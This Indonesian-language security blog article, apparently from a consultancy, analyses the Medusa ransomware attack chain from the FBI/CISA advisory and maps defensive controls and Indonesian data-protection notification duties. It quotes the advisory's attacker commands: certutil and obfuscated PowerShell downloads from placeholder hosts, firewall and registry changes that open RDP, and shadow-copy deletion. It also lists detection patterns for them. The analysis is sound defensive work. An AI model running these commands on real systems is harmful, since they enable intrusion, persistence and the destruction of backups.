Pada 18 Agustus 2026, FBI, CISA, dan Departemen Kesehatan Amerika Serikat (HHS) memperbarui advisory bersama #StopRansomware: Medusa Ransomware (AA25-071A). Angka di dalamnya cukup mengejutkan: jumlah korban yang terdampak melonjak dari lebih dari 300 organisasi pada Februari 2025 menjadi lebih dari 500 organisasi infrastruktur kritis per April 2026. Sektor yang terdampak mencakup kesehatan, pendidikan, hukum, asuransi, teknologi, dan manufaktur.
Bagi organisasi di Indonesia, angka itu bukan berita luar negeri yang bisa diabaikan. BSSN mencatat sekitar 5,5 miliar serangan siber sepanjang 2025 — naik sekitar tujuh kali lipat dibanding rata-rata tahunan periode 2020–2024 — dan 1,52 miliar serangan hanya pada rentang 1 Januari hingga 15 April 2026. Dari sekitar 5,2 miliar anomali trafik internet nasional yang terpantau, 93,78 persen di antaranya terkait potensi malware yang dapat berkembang menjadi serangan ransomware. Sektor pendidikan dan pemerintah daerah disebut menjadi sasaran yang makin sering, di samping perbankan, manufaktur, dan layanan kesehatan.
Artikel ini membedah rantai serangan Medusa tahap demi tahap berdasarkan advisory resmi, lalu menerjemahkannya menjadi kontrol keamanan konkret yang bisa diuji oleh tim IT dan SOC di Indonesia — termasuk konsekuensi hukumnya di bawah UU Perlindungan Data Pribadi.
Apa Itu Medusa, dan Mengapa Modelnya Berbahaya
Medusa pertama kali teridentifikasi pada Juni 2021. Awalnya ia beroperasi sebagai closed variant: seluruh pengembangan dan operasi dikendalikan satu kelompok. Sejak awal 2023 Medusa bertransformasi menjadi Ransomware-as-a-Service (RaaS) berbasis afiliasi, meski fungsi krusial seperti negosiasi tebusan tetap dipegang terpusat oleh pengembangnya.
Perlu ditegaskan agar tidak keliru: menurut investigasi FBI, varian Medusa ini tidak berkaitan dengan MedusaLocker maupun malware mobile bernama Medusa. Kesalahan atribusi seperti ini sering membuat tim respons insiden mengejar indikator yang salah.
Model RaaS berbahaya karena memisahkan keahlian. Pengembang menyediakan enkriptor, situs kebocoran, dan infrastruktur negosiasi; afiliasi cukup membawa akses. Advisory mencatat Medusa merekrut initial access broker (IAB) di forum kriminal dengan tawaran bayaran antara USD 100 hingga USD 1 juta. Artinya, satu kredensial VPN karyawan Anda yang bocor punya nilai pasar yang jelas.
Tahap 1: Akses Awal — Pintu Masuk yang Itu-Itu Saja
Tidak ada teknik eksotis di sini, dan justru itu poin pentingnya. Advisory mengidentifikasi dua jalur dominan:
- Phishing sebagai metode utama pencurian kredensial (T1566).
- Eksploitasi kerentanan perangkat lunak yang belum ditambal pada sistem yang terekspos internet (T1190) — advisory secara eksplisit menyebut kerentanan ScreenConnect authentication bypass (CVE-2024-1709) dan SQL injection Fortinet EMS (CVE-2023-48788). Pembaruan advisory melaporkan afiliasi Medusa juga mengeksploitasi kerentanan pada produk transfer file dan manajemen akses istimewa lain yang menghadap internet.
Polanya konsisten: perangkat tepi (edge) dan alat manajemen jarak jauh adalah titik masuk favorit. Keduanya kerap luput dari siklus patching karena dianggap "infrastruktur", bukan "aplikasi", dan sering tidak tercakup dalam inventaris aset formal.
Tahap 2: Discovery dan Living off the Land
Setelah masuk, Medusa memakai alat sah — Advanced IP Scanner dan SoftPerfect Network Scanner — untuk memetakan jaringan. Port yang rutin dipindai meliputi 21 (FTP), 22 (SSH), 23 (Telnet), 80/443 (HTTP/HTTPS), 1433 (SQL Server), 3050 (Firebird), 3128 (proxy), 3306 (MySQL), dan 3389 (RDP).
Enumerasi lanjutan dilakukan dengan PowerShell dan cmd.exe. Perintah yang diamati sangat biasa — systeminfo, ipconfig /all, net share, nltest /dclist:, net group "domain admins" /domain — sehingga nyaris tak terbedakan dari aktivitas administrator. Di sinilah living off the land (LOTL) bekerja: penyerang tidak membawa alat mencurigakan, mereka meminjam milik Anda.
Implikasi deteksi: jika SOC Anda hanya berburu file hash berbahaya, Anda tidak akan melihat Medusa sampai enkriptor dijalankan. Deteksi harus bergeser ke anomali perilaku — siapa yang menjalankan perintah itu, dari host mana, pada jam berapa, dan apakah akun tersebut biasanya melakukannya.
Tahap 3: Penghindaran Deteksi
Medusa menggunakan certutil.exe untuk mengunduh berkas agar tidak memicu alarm, sering dengan ekstensi menyesatkan:
cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll
Untuk PowerShell, advisory mendokumentasikan tiga tingkat obfuskasi yang makin kompleks. Yang paling sederhana adalah eksekusi perintah terenkode base64:
powershell -exec bypass -enc <base64 encoded command>
Tingkat berikutnya memecah string DownloadFile menjadi potongan-potongan agar lolos dari pencocokan kata kunci:
powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le';
Invoke-Expression (New-Object Net.WebClient).$x.Invoke('http://<ip>/<tool>.msi')
Tingkat tertinggi memuat payload base64 terkompresi gzip langsung ke memori dan mengeksekusinya sebagai scriptblock. Payload tersebut identik dengan powerfun.ps1, skrip stager publik yang membuka reverse atau bind shell melalui TLS di port 443 — bercampur mulus dengan trafik HTTPS normal.
Jejak juga dibersihkan. Riwayat PowerShell dihapus dengan Remove-Item (Get-PSReadlineOption).HistorySavePath. Dalam beberapa kasus, aktor memuat driver rentan atau bertanda tangan sah untuk mematikan EDR — teknik yang dikenal sebagai Bring Your Own Vulnerable Driver. Untuk komando dan kendali, mereka memakai Ligolo (reverse tunneling) dan Cloudflared (Cloudflare Tunnel), keduanya alat legal yang jarang masuk daftar blokir.
Tahap 4: Pergerakan Lateral lewat Alat Remote yang Sah
Ini bagian yang paling sering diremehkan. Medusa memilih perangkat lunak akses jarak jauh berdasarkan apa yang sudah ada di lingkungan korban, supaya tidak menonjol. Alat yang teramati: AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, dan Splashtop.
Kombinasinya dengan RDP dan PsExec. Salah satu skrip batch yang dieksekusi adalah openrdp.bat, yang membuka jalan masuk secara permanen:
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kredensial dipanen dengan Mimikatz melalui dumping memori LSASS (T1003.001). Aktor juga membuat akun domain baru untuk persistensi (T1136.002) dan menambahkannya ke grup istimewa seperti Domain Admins dan Enterprise Admins.
Tahap 5: Eksfiltrasi, Enkripsi, dan Pemerasan Berlapis
Sebelum mengenkripsi, data dikemas dan dikirim keluar menggunakan Rclone ke server C2 Medusa (T1567.002). Enkriptor bernama gaze.exe lalu disebar ke seluruh jaringan lewat PsExec, PDQ Deploy, atau BigFix.
Urutan kerja gaze.exe dirancang untuk memaksimalkan kerusakan: menghentikan seluruh layanan terkait backup, keamanan, basis data, komunikasi, berbagi berkas, dan situs web; menghapus shadow copy (vssadmin.exe Delete Shadows /all /quiet); mengenkripsi berkas dengan AES-256 dan memberi ekstensi .medusa; lalu menjatuhkan nota tebusan. Mesin virtual dimatikan manual dan dienkripsi, dan alat yang tadi dipasang dihapus.
Model pemerasannya ganda: bayar untuk dekripsi dan untuk mencegah publikasi data. Korban diberi tenggat 48 jam untuk menghubungi aktor via live chat Tor atau Tox. Ada situs kebocoran .onion dengan hitung mundur, dan korban bisa membayar USD 10.000 hanya untuk menambah satu hari pada penghitung waktu. Yang paling merusak kepercayaan: FBI mendokumentasikan satu korban yang, setelah membayar, dihubungi aktor Medusa lain yang mengklaim negosiator sebelumnya mencuri uang tebusan dan meminta separuh pembayaran diulang — indikasi skema pemerasan tiga lapis.
Ini alasan teknis, bukan sekadar moral, mengapa FBI dan CISA tidak menganjurkan pembayaran tebusan: membayar tidak menjamin data kembali, dan dalam kasus Medusa bahkan tidak menjamin pemerasan berhenti.
Konteks Hukum Indonesia: Bukan Sekadar Insiden Teknis
Serangan ransomware dengan eksfiltrasi data hampir pasti merupakan kegagalan pelindungan data pribadi. Di bawah UU No. 27 Tahun 2022 tentang Pelindungan Data Pribadi (UU PDP), Pengendali Data Pribadi wajib memberitahukan secara tertulis kegagalan pelindungan data pribadi paling lambat 3x24 jam kepada Subjek Data Pribadi dan lembaga terkait. Pemberitahuan itu setidaknya memuat data pribadi yang terungkap, kapan dan bagaimana terungkap, serta penanganan dan upaya pemulihannya.
Sanksi administratif dalam UU PDP mencakup peringatan tertulis, penghentian sementara pemrosesan, penghapusan data, hingga denda administratif maksimal 2 persen dari pendapatan tahunan atas variabel pelanggaran. Bagi penyelenggara sistem elektronik, kewajiban keamanan juga melekat lewat UU ITE beserta perubahannya dan PP No. 71 Tahun 2019.
Konsekuensi praktisnya: jam pertama insiden bukan hanya soal isolasi jaringan, tapi juga soal menghitung tenggat notifikasi. Organisasi yang tidak punya prosedur pelaporan tertulis akan kehilangan 3x24 jam itu untuk berdebat internal.
Peta Pertahanan: Kontrol yang Langsung Memotong Rantai Medusa
Alih-alih daftar praktik generik, berikut kontrol yang dipetakan langsung ke tahap serangan di atas:
- Tutup jalur akses awal. Inventarisasi seluruh aset yang menghadap internet — VPN, firewall, RMM, portal transfer file — dan prioritaskan penambalan kerentanan yang diketahui aktif dieksploitasi. Wajibkan MFA untuk semua layanan jarak jauh, terutama VPN, webmail, dan akun administratif.
- Kendalikan alat akses jarak jauh. Buat daftar putih (allowlist) RMM yang resmi dipakai organisasi, lalu blokir dan beri alarm untuk semua yang lain. Kemunculan AnyDesk atau Splashtop di server yang tidak seharusnya adalah sinyal insiden, bukan gangguan kecil.
- Segmentasi jaringan. Batasi RDP antar-segmen, wajibkan jump host atau VPN untuk akses administratif, dan nonaktifkan port yang tidak dipakai. Segmentasi adalah kontrol tunggal paling efektif untuk membatasi ledakan enkripsi.
- Awasi skrip, bukan hanya berkas. Aktifkan PowerShell Script Block Logging dan Module Logging, kirim ke SIEM, dan buat deteksi untuk pola
-enc,-exec bypass,certutil -urlcache, serta penghapusan riwayat PSReadline. Terapkan prinsip hak akses terkecil pada kemampuan skrip. - Lindungi kredensial. Aktifkan proteksi LSASS (Credential Guard / ASR rule "Block credential stealing from lsass.exe"), audit rutin keanggotaan grup istimewa, dan beri alarm pada pembuatan akun domain baru.
- Backup yang benar-benar tahan serangan. Backup harus offline atau immutable, terenkripsi, tersegmentasi secara fisik, dan — ini yang paling sering gagal — diuji pemulihannya secara berkala. Medusa secara spesifik menghentikan layanan backup dan menghapus shadow copy; backup yang bisa dijangkau dari domain yang sama tidak akan menyelamatkan Anda.
- Deteksi eksfiltrasi. Pantau lonjakan trafik keluar, pemakaian Rclone, dan tunnel keluar via Cloudflared atau Ligolo. Eksfiltrasi terjadi sebelum enkripsi — ini jendela terakhir Anda untuk mencegah pemerasan data.
- Validasi kontrol, jangan diasumsikan. CISA menyarankan menguji kontrol yang ada terhadap teknik MITRE ATT&CK yang tercantum di advisory secara berulang di lingkungan produksi berskala nyata, lalu menyetel ulang orang, proses, dan teknologi berdasarkan hasilnya.
Penutup
Yang membuat Medusa berhasil menembus 500 organisasi bukan kecanggihan luar biasa, melainkan konsistensi mengeksploitasi kelemahan yang sama: perangkat tepi yang telat ditambal, kredensial tanpa MFA, jaringan datar, alat administrasi yang tak diawasi, dan backup yang bisa dihapus dari dalam domain. Semuanya adalah masalah higiene keamanan, bukan masalah teknologi mutakhir.
Bagi organisasi Indonesia — terutama sektor pendidikan, pemerintah daerah, kesehatan, dan manufaktur yang menurut BSSN paling sering disasar — pesan yang perlu diambil sederhana: perlakukan advisory AA25-071A sebagai checklist audit, bukan sebagai berita. Ambil delapan kontrol di atas, uji satu per satu terhadap lingkungan Anda, dan dokumentasikan hasilnya. Kesiapan yang teruji jauh lebih murah daripada 48 jam menghitung mundur di depan situs kebocoran.
Siberindo mendampingi organisasi dalam penilaian kesiapan ransomware, threat hunting berbasis TTP, forensik digital, dan penyusunan prosedur respons insiden yang selaras dengan kewajiban notifikasi UU PDP.

